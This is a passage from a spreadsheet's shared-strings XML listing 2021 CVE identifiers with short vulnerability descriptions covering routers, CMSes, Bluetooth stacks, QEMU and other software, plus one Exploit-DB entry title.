    <t>RICOH Printer series SP products 320DN, SP 325DNw, SP 320SN, SP 320SFN, SP 325SNw, SP 325SFNw, SP 330SN, Aficio SP 3500SF, SP 221S, SP 220SNw, SP 221SNw, SP 221SF, SP 220SFNw, SP 221SFNw v1.06 were discovered to contain a stack buffer overflow in the file /etc/wpa_supplicant.conf. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data.</t>
  </si>
  <si>
    <t>CVE-2021-3395</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Pryaniki 6.44.3 allows remote authenticated users to upload an arbitrary file. The JavaScript code will execute when someone visits the attachment.</t>
  </si>
  <si>
    <t>CVE-2021-3396</t>
  </si>
  <si>
    <t>OpenNMS Meridian 2016, 2017, 2018 before 2018.1.25, 2019 before 2019.1.16, and 2020 before 2020.1.5, Horizon 1.2 through 27.0.4, and Newts &lt;1.5.3 has Incorrect Access Control, which allows local and remote code execution using JEXL expressions.</t>
  </si>
  <si>
    <t>CVE-2021-33961</t>
  </si>
  <si>
    <t>A Cross Site Scripting (XSS) vulnerabililty exists in enhanced-github v5.0.11 via the file name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33962</t>
  </si>
  <si>
    <t>China Mobile An Lianbao WF-1 router v1.0.1 is affected by an OS command injection vulnerability in the web interface /api/ZRUsb/pop_usb_device component.</t>
  </si>
  <si>
    <t>CVE-2021-33963</t>
  </si>
  <si>
    <t>China Mobile An Lianbao WF-1 v1.0.1 router web interface through /api/ZRMacClone/mac_addr_clone receives parameters by POST request, and the parameter macType has a command injection vulnerability. An attacker can use the vulnerability to execute remote commands.</t>
  </si>
  <si>
    <t>CVE-2021-33964</t>
  </si>
  <si>
    <t>China Mobile An Lianbao WF-1 V1.0.1 router provides a web interface /api/ZRRuleFilter/set_firewall_level which receives parameters by POST request, and the parameter firewall_level has a command injection vulnerability. An attacker can use the vulnerability to execute remote commands.</t>
  </si>
  <si>
    <t>CVE-2021-33965</t>
  </si>
  <si>
    <t>China Mobile An Lianbao WF-1 V1.0.1 router provides a web interface /api/ZRMesh/set_ZRMesh which receives parameters by POST request, and the parameter mesh_enable and mesh_device have a command injection vulnerability. An attacker can use the vulnerability to execute remote commands.</t>
  </si>
  <si>
    <t>CVE-2021-33966</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) vulnerability in spotweb 1.4.9, allows authenticated attackers to execute arbitrary code via crafted GET request to the login page.</t>
  </si>
  <si>
    <t>CVE-2021-3398</t>
  </si>
  <si>
    <t>Stormshield Network Security (SNS) 3.x has an Integer Overflow in the high-availability component.</t>
  </si>
  <si>
    <t>CVE-2021-33981</t>
  </si>
  <si>
    <t>An insecure, direct object vulnerability in hunting/fishing license retrieval function of the "Fish | Hunt FL" iOS app versions 3.8.0 and earlier allows a remote authenticated attacker to retrieve other people's personal information and images of their hunting/fishing licenses.</t>
  </si>
  <si>
    <t>CVE-2021-33982</t>
  </si>
  <si>
    <t>An insufficient session expiration vulnerability exists in the "Fish | Hunt FL" iOS app version 3.8.0 and earlier, which allows a remote attacker to reuse, spoof, or steal other user and admin sessions.</t>
  </si>
  <si>
    <t>CVE-2021-33988</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form.</t>
  </si>
  <si>
    <t>CVE-2021-3401</t>
  </si>
  <si>
    <t>Bitcoin Core before 0.19.0 might allow remote attackers to execute arbitrary code when another application unsafely passes the -platformpluginpath argument to the bitcoin-qt program, as demonstrated by an x-scheme-handler/bitcoin handler for a .desktop file or a web browser. NOTE: the discoverer states "I believe that this vulnerability cannot actually be exploited."</t>
  </si>
  <si>
    <t>CVE-2021-3402</t>
  </si>
  <si>
    <t>An integer overflow and several buffer overflow reads in libyara/modules/macho/macho.c in YARA v4.0.3 and earlier could allow an attacker to either cause denial of service or information disclosure via a malicious Mach-O file. Affects all versions before libyara 4.0.4</t>
  </si>
  <si>
    <t>CVE-2021-3403</t>
  </si>
  <si>
    <t>In ytnef 1.9.3, the TNEFSubjectHandler function in lib/ytnef.c allows remote attackers to cause a denial-of-service (and potentially code execution) due to a double free which can be triggered via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3404</t>
  </si>
  <si>
    <t>In ytnef 1.9.3, the SwapWord function in lib/ytnef.c allows remote attackers to cause a denial-of-service (and potentially code execution) due to a heap buffer overflow which can be triggered via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3405</t>
  </si>
  <si>
    <t>A flaw was found in libebml before 1.4.2. A heap overflow bug exists in the implementation of EbmlString::ReadData and EbmlUnicodeString::ReadData in libebml.</t>
  </si>
  <si>
    <t>CVE-2021-34055</t>
  </si>
  <si>
    <t>jhead 3.06 is vulnerable to Buffer Overflow via exif.c in function Put16u.</t>
  </si>
  <si>
    <t>CVE-2021-3406</t>
  </si>
  <si>
    <t>A flaw was found in keylime 5.8.1 and older. The issue in the Keylime agent and registrar code invalidates the cryptographic chain of trust from the Endorsement Key certificate to agent attestations.</t>
  </si>
  <si>
    <t>CVE-2021-34066</t>
  </si>
  <si>
    <t>An issue was discovered in EdgeGallery/developer before v1.0. There is a "Deserialization of yaml file" vulnerability that can allow attackers to execute system command through uploading the malicious constructed YAML file.</t>
  </si>
  <si>
    <t>CVE-2021-34067</t>
  </si>
  <si>
    <t>Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-34068</t>
  </si>
  <si>
    <t>CVE-2021-34069</t>
  </si>
  <si>
    <t>Divide-by-zero bug in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3407</t>
  </si>
  <si>
    <t>A flaw was found in mupdf 1.18.0. Double free of object during linearization may lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2021-34070</t>
  </si>
  <si>
    <t>Out-of-bounds Read in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-34071</t>
  </si>
  <si>
    <t>CVE-2021-34073</t>
  </si>
  <si>
    <t>A Cross Site Scripting (XSS) vulnerabilty exists in Sourcecodester Gadget Works Online Ordering System in PHP/MySQLi 1.0 via the Category parameter in an add function in category/index.php.</t>
  </si>
  <si>
    <t>CVE-2021-34074</t>
  </si>
  <si>
    <t>PandoraFMS &lt;=7.54 allows arbitrary file upload, it leading to remote command execution via the File Manager. To bypass the built-in protection, a relative path is used in the requests.</t>
  </si>
  <si>
    <t>CVE-2021-34075</t>
  </si>
  <si>
    <t>In Artica Pandora FMS &lt;=754 in the File Manager component, there is sensitive information exposed on the client side which attackers can access.</t>
  </si>
  <si>
    <t>CVE-2021-34078</t>
  </si>
  <si>
    <t>lifion-verify-dependencies through 1.1.0 is vulnerable to OS command injection via a crafted dependency name on the scanned project's package.json file.</t>
  </si>
  <si>
    <t>CVE-2021-34079</t>
  </si>
  <si>
    <t>OS Command injection vulnerability in Mintzo Docker-Tester through 1.2.1 allows attackers to execute arbitrary commands via shell metacharacters in the 'ports' entry of a crafted docker-compose.yml file.</t>
  </si>
  <si>
    <t>CVE-2021-34080</t>
  </si>
  <si>
    <t>OS Command Injection vulnerability in es128 ssl-utils 1.0.0 for Node.js allows attackers to execute arbitrary commands via unsanitized shell metacharacters provided to the createCertRequest() and the createCert() functions.</t>
  </si>
  <si>
    <t>CVE-2021-34081</t>
  </si>
  <si>
    <t>OS Command Injection vulnerability in bbultman gitsome through 0.2.3 allows attackers to execute arbitrary commands via a crafted tag name of the target git repository.</t>
  </si>
  <si>
    <t>CVE-2021-34082</t>
  </si>
  <si>
    <t>OS Command Injection vulnerability in allenhwkim proctree through 0.1.1 and commit 0ac10ae575459457838f14e21d5996f2fa5c7593 for Node.js, allows attackers to execute arbitrary commands via the fix function.</t>
  </si>
  <si>
    <t>CVE-2021-34083</t>
  </si>
  <si>
    <t>Google-it is a Node.js package which allows its users to send search queries to Google and receive the results in a JSON format. When using the 'Open in browser' option in versions up to 1.6.2, google-it will unsafely concat the result's link retrieved from google to a shell command, potentially exposing the server to RCE.</t>
  </si>
  <si>
    <t>CVE-2021-34084</t>
  </si>
  <si>
    <t>OS command injection vulnerability in Turistforeningen node-s3-uploader through 2.0.3 for Node.js allows attackers to execute arbitrary commands via the metadata() function.</t>
  </si>
  <si>
    <t>CVE-2021-34085</t>
  </si>
  <si>
    <t>Read access violation in the III_dequantize_sample function in mpglibDBL/layer3.c in mp3gain through 1.5.2-r2 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact, a different vulnerability than CVE-2017-9872. CVE-2017-14409, and CVE-2018-10778.</t>
  </si>
  <si>
    <t>CVE-2021-34086</t>
  </si>
  <si>
    <t>In Ultimaker S3 3D printer, Ultimaker S5 3D printer, Ultimaker 3 3D printer S-line through 6.3 and Ultimaker 3 through 5.2.16, the local webserver hosts APIs vulnerable to CSRF. They do not verify incoming requests.</t>
  </si>
  <si>
    <t>CVE-2021-34087</t>
  </si>
  <si>
    <t>In Ultimaker S3 3D printer, Ultimaker S5 3D printer, Ultimaker 3 3D printer S-line through 6.3 and Ultimaker 3 through 5.2.16, the local webserver can be used for clickjacking. This includes the settings page.</t>
  </si>
  <si>
    <t>CVE-2021-3409</t>
  </si>
  <si>
    <t>The patch for CVE-2020-17380/CVE-2020-25085 was found to be ineffective, thus making QEMU vulnerable to the out-of-bounds read/write access issues previously found in the SDHCI controller emulation code. This flaw allows a malicious privileged guest to crash the QEMU process on the host, resulting in a denial of service or potential code execution. QEMU up to (including) 5.2.0 is affected by this.</t>
  </si>
  <si>
    <t>CVE-2021-3410</t>
  </si>
  <si>
    <t>A flaw was found in libcaca v0.99.beta19. A buffer overflow issue in caca_resize function in libcaca/caca/canvas.c may lead to local execution of arbitrary code in the user context.</t>
  </si>
  <si>
    <t>CVE-2021-3411</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel in versions prior to 5.10. A violation of memory access was found while detecting a padding of int3 in the linking state. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>exploits/windows/local/50083.txt</t>
  </si>
  <si>
    <t>WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control</t>
  </si>
  <si>
    <t>CVE-2021-34110</t>
  </si>
  <si>
    <t>WinWaste.NET version 1.0.6183.16475 has incorrect permissions, allowing a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34111</t>
  </si>
  <si>
    <t>Thecus 4800Eco was discovered to contain a command injection vulnerability via the username parameter in /adm/setmain.php.</t>
  </si>
  <si>
    <t>CVE-2021-3412</t>
  </si>
  <si>
    <t>It was found that all versions of 3Scale developer portal lacked brute force protections. An attacker could use this gap to bypass login controls, and access privileged information, or possibly conduct further attacks.</t>
  </si>
  <si>
    <t>CVE-2021-34122</t>
  </si>
  <si>
    <t>The function bitstr_tell at bitstr.c in ffjpeg commit 4ab404e has a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2021-34128</t>
  </si>
  <si>
    <t>LaikeTui 3.5.0 allows remote authenticated users to execute arbitrary PHP code by using index.php?module=system&amp;action=pay to upload a ZIP archive containing a .php file, as demonstrated by the ../../../../phpinfo.php pathname.</t>
  </si>
  <si>
    <t>CVE-2021-34129</t>
  </si>
  <si>
    <t>LaikeTui 3.5.0 allows remote authenticated users to delete arbitrary files, as demonstrated by deleting install.lock in order to reinstall the product in an attacker-controlled manner. This deletion is possible via directory traversal in the uploadImg, oldpic, or imgurl parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3413</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat Satellite in tfm-rubygem-foreman_azure_rm in versions before 2.2.0. A credential leak was identified which will expose Azure Resource Manager's secret key through JSON of the API output. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3414</t>
  </si>
  <si>
    <t>A flaw was found in satellite. When giving granular permission related to the organization, other permissions allowing a user to view and manage other organizations are also granted. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-34141</t>
  </si>
  <si>
    <t>An incomplete string comparison in the numpy.core component in NumPy before 1.22.0 allows attackers to trigger slightly incorrect copying by constructing specific string objects. NOTE: the vendor states that this reported code behavior is "completely harmless."</t>
  </si>
  <si>
    <t>CVE-2021-34143</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Zhuhai Jieli AC6366C_DEMO_V1.0 does not properly handle the reception of continuous unsolicited LMP responses, allowing attackers in radio range to trigger a denial of service (deadlock) of the device by flooding it with LMP_AU_Rand packets after paging procedure. User intervention is required to restart the device.</t>
  </si>
  <si>
    <t>CVE-2021-34144</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Zhuhai Jieli AC6366C BT SDK through 0.9.1 does not properly handle the reception of truncated LMP_SCO_Link_Request packets while no other BT connections are active, allowing attackers in radio range to prevent new BT connections (disabling the AB5301A inquiry and page scan procedures) via a crafted LMP packet. The user needs to manually perform a power cycle (restart) of the device to restore BT connectivity.</t>
  </si>
  <si>
    <t>CVE-2021-34145</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Cypress WICED BT stack through 2.9.0 for CYW20735B1 devices does not properly handle the reception of LMP_max_slot with an invalid Baseband packet type (and LT_ADDRESS and LT_ADDR) after completion of the LMP setup procedure, allowing attackers in radio range to trigger a denial of service (firmware crash) via a crafted LMP packet.</t>
  </si>
  <si>
    <t>CVE-2021-34146</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Cypress CYW920735Q60EVB does not properly handle the reception of continuous unsolicited LMP responses, allowing attackers in radio range to trigger a denial of service and restart (crash) of the device by flooding it with LMP_AU_Rand packets after the paging procedure.</t>
  </si>
  <si>
    <t>CVE-2021-34147</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Cypress WICED BT stack through 2.9.0 for CYW20735B1 does not properly handle the reception of a malformed LMP timing accuracy response followed by multiple reconnections to the link slave, allowing attackers to exhaust device BT resources and eventually trigger a crash via multiple attempts of sending a crafted LMP timing accuracy response followed by a sudden reconnection with a random BDAddress.</t>
  </si>
  <si>
    <t>CVE-2021-34148</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in the Cypress WICED BT stack through 2.9.0 for CYW20735B1 devices does not properly handle the reception of LMP_max_slot with a greater ACL Length after completion of the LMP setup procedure, allowing attackers in radio range to trigger a denial of service (firmware crash) via a crafted LMP packet.</t>
  </si>
  <si>
    <t>CVE-2021-34149</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on the Texas Instruments CC256XCQFN-EM does not properly handle the reception of continuous LMP_AU_Rand packets, allowing attackers in radio range to trigger a denial of service (deadlock) of the device by flooding it with LMP_AU_Rand packets after the paging procedure.</t>
  </si>
  <si>
    <t>CVE-2021-34150</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Bluetrum AB5301A devices with unknown firmware versions does not properly handle the reception of oversized DM1 LMP packets while no other BT connections are active, allowing attackers in radio range to prevent new BT connections (disabling the AB5301A inquiry and page scan procedures) via a crafted LMP packet. The user needs to manually perform a power cycle (restart) of the device to restore BT connectivity.</t>
  </si>
  <si>
    <t>CVE-2021-3416</t>
  </si>
  <si>
    <t>A potential stack overflow via infinite loop issue was found in various NIC emulators of QEMU in versions up to and including 5.2.0. The issue occurs in loopback mode of a NIC wherein reentrant DMA checks get bypassed. A guest user/process may use this flaw to consume CPU cycles or crash the QEMU process on the host resulting in DoS scenario.</t>
  </si>
  <si>
    <t>CVE-2021-34165</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability in Sourcecodester Basic Shopping Cart 1.0 allows a remote attacker to Bypass Authentication and become Admin.</t>
  </si>
  <si>
    <t>CVE-2021-34166</t>
  </si>
  <si>
    <t>A SQL INJECTION vulnerability in Sourcecodester Simple Food Website 1.0 allows a remote attacker to Bypass Authentication and become Admin.</t>
  </si>
  <si>
    <t>CVE-2021-3417</t>
  </si>
  <si>
    <t>An internal product security audit of LXCO, prior to version 1.2.2, discovered that credentials for Lenovo XClarity Administrator (LXCA), if added as a Resource Manager, are encoded then written to an internal LXCO log file each time a session is established with LXCA. Affected logs are captured in the First Failure Data Capture (FFDC) service log. The FFDC service log is only generated when requested by a privileged LXCO user and it is only accessible to the privileged LXCO user that requested the file.</t>
  </si>
  <si>
    <t>CVE-2021-34170</t>
  </si>
  <si>
    <t>Bandai Namco FromSoftware Dark Souls III allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-34173</t>
  </si>
  <si>
    <t>An attacker can cause a Denial of Service and kernel panic in v4.2 and earlier versions of Espressif esp32 via a malformed beacon csa frame. The device requires a reboot to recover.</t>
  </si>
  <si>
    <t>CVE-2021-34174</t>
  </si>
  <si>
    <t>A vulnerability exists in Broadcom BCM4352 and BCM43684 chips. Any wireless router using BCM4352 and BCM43684 will be affected, such as ASUS AX6100. An attacker may cause a Denial of Service (DoS) to any device connected to BCM4352 or BCM43684 routers via an association or reassociation frame.</t>
  </si>
  <si>
    <t>CVE-2021-3418</t>
  </si>
  <si>
    <t>If certificates that signed grub are installed into db, grub can be booted directly. It will then boot any kernel without signature validation. The booted kernel will think it was booted in secureboot mode and will implement lockdown, yet it could have been tampered. This flaw is a reintroduction of CVE-2020-15705 and only affects grub2 versions prior to 2.06 and upstream and distributions using the shim_lock mechanism.</t>
  </si>
  <si>
    <t>CVE-2021-34184</t>
  </si>
  <si>
    <t>Miniaudio 0.10.35 has a Double free vulnerability that could cause a buffer overflow in ma_default_vfs_close__stdio in miniaudio.h.</t>
  </si>
  <si>
    <t>CVE-2021-34185</t>
  </si>
  <si>
    <t>Miniaudio 0.10.35 has an integer-based buffer overflow caused by an out-of-bounds left shift in drwav_bytes_to_u32 in miniaudio.h</t>
  </si>
  <si>
    <t>CVE-2021-34187</t>
  </si>
  <si>
    <t>main/inc/ajax/model.ajax.php in Chamilo through 1.11.14 allows SQL Injection via the searchField, filters, or filters2 parameter.</t>
  </si>
  <si>
    <t>CVE-2021-34190</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Name" or "Prefix" fields under the "Create New Rate" module.</t>
  </si>
  <si>
    <t>CVE-2021-3420</t>
  </si>
  <si>
    <t>A flaw was found in newlib in versions prior to 4.0.0. Improper overflow validation in the memory allocation functions mEMALIGn, pvALLOc, nano_memalign, nano_valloc, nano_pvalloc could case an integer overflow, leading to an allocation of a small buffer and then to a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-34201</t>
  </si>
  <si>
    <t>D-Link DIR-2640-US 1.01B04 is vulnerable to Buffer Overflow. There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640). Local ordinary users can overwrite the global variables in the .bss section, causing the process crashes or changes.</t>
  </si>
  <si>
    <t>CVE-2021-34202</t>
  </si>
  <si>
    <t>There are multiple out-of-bounds vulnerabilities in some processes of D-Link AC2600(DIR-2640) 1.01B04. Ordinary permissions can be elevated to administrator permissions, resulting in local arbitrary code execution. An attacker can combine other vulnerabilities to further achieve the purpose of remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-34203</t>
  </si>
  <si>
    <t>D-Link DIR-2640-US 1.01B04 is vulnerable to Incorrect Access Control. Router ac2600 (dir-2640-us), when setting PPPoE, will start quagga process in the way of whole network monitoring, and this function uses the original default password and port. An attacker can easily use telnet to log in, modify routing information, monitor the traffic of all devices under the router, hijack DNS and phishing attacks. In addition, this interface is likely to be questioned by customers as a backdoor, because the interface should not be exposed.</t>
  </si>
  <si>
    <t>CVE-2021-34204</t>
  </si>
  <si>
    <t>D-Link DIR-2640-US 1.01B04 is affected by Insufficiently Protected Credentials. D-Link AC2600(DIR-2640) stores the device system account password in plain text. It does not use linux user management. In addition, the passwords of all devices are the same, and they cannot be modified by normal users. An attacker can easily log in to the target router through the serial port and obtain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34207</t>
  </si>
  <si>
    <t>Cross-site scripting in ddns.htm in TOTOLINK A3002R version V1.1.1-B20200824 (Important Update, new UI) allows attackers to execute arbitrary JavaScript by modifying the "Domain Name" field, "Server Address" field, "User Name/Email", or "Password/Key" field.</t>
  </si>
  <si>
    <t>CVE-2021-3421</t>
  </si>
  <si>
    <t>A flaw was found in the RPM package in the read functionality. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package or compromise an RPM repository, to cause RPM database corruption. The highest threat from this vulnerability is to data integrity. This flaw affects RPM versions before 4.17.0-alpha.</t>
  </si>
  <si>
    <t>CVE-2021-34215</t>
  </si>
  <si>
    <t>Cross-site scripting in tcpipwan.htm in TOTOLINK A3002R version V1.1.1-B20200824 (Important Update, new UI) allows attackers to execute arbitrary JavaScript by modifying the "Service Name" field.</t>
  </si>
  <si>
    <t>CVE-2021-34218</t>
  </si>
  <si>
    <t>Directory Indexing in Login Portal of Login Portal of TOTOLINK-A702R-V1.0.0-B20161227.1023 allows attacker to access /add/ , /img/, /js/, and /mobile directories via GET Parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3422</t>
  </si>
  <si>
    <t>The lack of validation of a key-value field in the Splunk-to-Splunk protocol results in a denial-of-service in Splunk Enterprise instances configured to index Universal Forwarder traffic. The vulnerability impacts Splunk Enterprise versions before 7.3.9, 8.0 versions before 8.0.9, and 8.1 versions before 8.1.3. It does not impact Universal Forwarders. When Splunk forwarding is secured using TLS or a Token, the attack requires compromising the certificate or token, or both. Implementation of either or both reduces the severity to Medium.</t>
  </si>
  <si>
    <t>CVE-2021-34220</t>
  </si>
  <si>
    <t>Cross-site scripting in tr069config.htm in TOTOLINK A3002R version V1.1.1-B20200824 (Important Update, new UI) allows attackers to execute arbitrary JavaScript by modifying the "User Name" field or "Password" field.</t>
  </si>
  <si>
    <t>CVE-2021-34223</t>
  </si>
  <si>
    <t>Cross-site scripting in urlfilter.htm in TOTOLINK A3002R version V1.1.1-B20200824 (Important Update, new UI) allows attackers to execute arbitrary JavaScript by modifying the "URL Address" field.</t>
  </si>
  <si>
    <t>CVE-2021-34228</t>
  </si>
  <si>
    <t>Cross-site scripting in parent_control.htm in TOTOLINK A3002R version V1.1.1-B20200824 (Important Update, new UI) allows attackers to execute arbitrary JavaScript by modifying the "Description" field and "Service Name" field.</t>
  </si>
  <si>
    <t>CVE-2021-3423</t>
  </si>
  <si>
    <t>Uncontrolled Search Path Element vulnerability in the openssl component as used in Bitdefender GravityZone Business Security allows an attacker to load a third party DLL to elevate privileges. This issue affects Bitdefender GravityZone Business Security versions prior to 6.6.23.329.</t>
  </si>
  <si>
    <t>CVE-2021-34235</t>
  </si>
  <si>
    <t>Tokheim Profleet DiaLOG 11.005.02 is affected by SQL Injection. The component is the Field__UserLogin parameter on the logon page.</t>
  </si>
  <si>
    <t>CVE-2021-34236</t>
  </si>
  <si>
    <t>Buffer Overflow in Netgear R8000 Router with firmware v1.0.4.56 allows remote attackers to execute arbitrary code or cause a denial-of-service by sending a crafted POST to '/bd_genie_create_account.cgi' with a sufficiently long parameter 'register_country'.</t>
  </si>
  <si>
    <t>CVE-2021-3424</t>
  </si>
  <si>
    <t>A flaw was found in keycloak as shipped in Red Hat Single Sign-On 7.4 where IDN homograph attacks are possible. A malicious user can register himself with a name already registered and trick admin to grant him extra privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34243</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to execute arbitrary web scripts or HTML via a crafted file uploaded into the Document Management tab. The exploit is triggered when a user visits the upload location of the crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-34244</t>
  </si>
  <si>
    <t>A cross site request forgery (CSRF) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to create new admin accounts or change users' passwords.</t>
  </si>
  <si>
    <t>CVE-2021-3425</t>
  </si>
  <si>
    <t>A flaw was found in the AMQ Broker that discloses JDBC encrypted usernames and passwords when provided in the AMQ Broker application logfile when using the jdbc persistence functionality. Versions shipped in Red Hat AMQ 7 are vulnerable.</t>
  </si>
  <si>
    <t>CVE-2021-34250</t>
  </si>
  <si>
    <t>An issue was discovered in baijiacms v4. There is a CSRF vulnerability that can modify the store information and login password.</t>
  </si>
  <si>
    <t>CVE-2021-34254</t>
  </si>
  <si>
    <t>Umbraco CMS before 7.15.7 is vulnerable to Open Redirection due to insufficient url sanitization on booting.aspx.</t>
  </si>
  <si>
    <t>CVE-2021-34257</t>
  </si>
  <si>
    <t>Multiple Remote Code Execution (RCE) vulnerabilities exist in WPanel 4 4.3.1 and below via a malicious PHP file upload to (1) Dashboard's Avatar image, (2) Posts Folder image, (3) Pages Folder image and (4) Gallery Folder image.</t>
  </si>
  <si>
    <t>CVE-2021-34259</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the USBH_ParseCfgDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-3426</t>
  </si>
  <si>
    <t>There's a flaw in Python 3's pydoc. A local or adjacent attacker who discovers or is able to convince another local or adjacent user to start a pydoc server could access the server and use it to disclose sensitive information belonging to the other user that they would not normally be able to access. The highest risk of this flaw is to data confidentiality. This flaw affects Python versions before 3.8.9, Python versions before 3.9.3 and Python versions before 3.10.0a7.</t>
  </si>
  <si>
    <t>CVE-2021-34260</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the USBH_ParseInterfaceDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-34261</t>
  </si>
  <si>
    <t>An issue in USBH_ParseCfgDesc() of STMicroelectronics STM32Cube Middleware v1.8.0 and below causes a denial of service due to the system hanging when trying to set a remote wake-up feature.</t>
  </si>
  <si>
    <t>CVE-2021-34262</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the USBH_ParseEPDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-34267</t>
  </si>
  <si>
    <t>An in the USBH_MSC_InterfaceInit() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below causes a denial of service (DOS) when the system tries to communicate with the connected endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-34268</t>
  </si>
  <si>
    <t>An issue in the USBH_ParseDevDesc() function of STMicroelectronics STM32Cube Middleware v1.8.0 and below causes a denial of service (DOS) via a malformed USB device packet.</t>
  </si>
  <si>
    <t>CVE-2021-3427</t>
  </si>
  <si>
    <t>The Deluge Web-UI is vulnerable to XSS through a crafted torrent file. The the data from torrent files is not properly sanitised as it's interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary Javascript code in the context of the user's browser session.</t>
  </si>
  <si>
    <t>CVE-2021-34270</t>
  </si>
  <si>
    <t>An integer overflow in the mintToken function of a smart contract implementation for Doftcoin Token, an Ethereum ERC20 token, allows the owner to cause unexpected financial losses.</t>
  </si>
  <si>
    <t>CVE-2021-34272</t>
  </si>
  <si>
    <t>A security flaw in the 'owned' function of a smart contract implementation for RobotCoin (RBTC), a tradeable Ethereum ERC20 token, allows attackers to hijack victim accounts and arbitrarily increase the digital supply of assets.</t>
  </si>
  <si>
    <t>CVE-2021-34273</t>
  </si>
  <si>
    <t>A security flaw in the 'owned' function of a smart contract implementation for BTC2X (B2X), a tradeable Ethereum ERC20 token, allows attackers to hijack victim accounts and arbitrarily increase the digital supply of assets.</t>
  </si>
  <si>
    <t>CVE-2021-3428</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. A denial of service problem is identified if an extent tree is corrupted in a crafted ext4 filesystem in fs/ext4/extents.c in ext4_es_cache_extent. Fabricating an integer overflow, A local attacker with a special user privilege may cause a system crash problem which can lead to an availability threat.</t>
  </si>
  <si>
    <t>CVE-2021-34280</t>
  </si>
  <si>
    <t>Polaris Office v9.103.83.44230 is affected by a Uninitialized Pointer Vulnerability in PolarisOffice.exe and EngineDLL.dll that may cause a Remote Code Execution. To exploit the vulnerability, someone must open a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-34291</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Gif_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing GIF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-12956)</t>
  </si>
  <si>
    <t>CVE-2021-34292</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-12959)</t>
  </si>
  <si>
    <t>CVE-2021-34293</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Gif_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing GIF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13020)</t>
  </si>
  <si>
    <t>CVE-2021-34294</t>
  </si>
  <si>
